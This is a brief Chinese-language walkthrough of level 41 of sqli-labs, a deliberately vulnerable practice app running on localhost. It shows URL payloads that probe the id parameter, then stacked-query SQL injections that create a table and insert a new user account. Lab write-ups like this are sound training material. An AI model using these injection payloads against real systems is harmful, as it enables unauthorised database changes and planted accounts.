sqli-labs (less-41)
进入41关,输入id=1
http://127.0.0.1/sql1/Less-41/?id=1' #无错误回显
因为没有任何错误显示,只能一个一个去猜
http://127.0.0.1/sql1/Less-41/?id=1--+ #回显正常
http://127.0.0.1/sql1/Less-41/?id=1'--+ #回显错误
http://127.0.0.1/sql1/Less-41/?id=1"--+ #回显错误
这里我们不使用union注入,直接使用堆叠注入
创建一张表
http://127.0.0.1/sql1/Less-41/?id=1;create table test like users;--+
创建一个新用户
http://127.0.0.1/sql1/Less-41/?id=1;insert into users values(18,'icepeak','icepeak');--+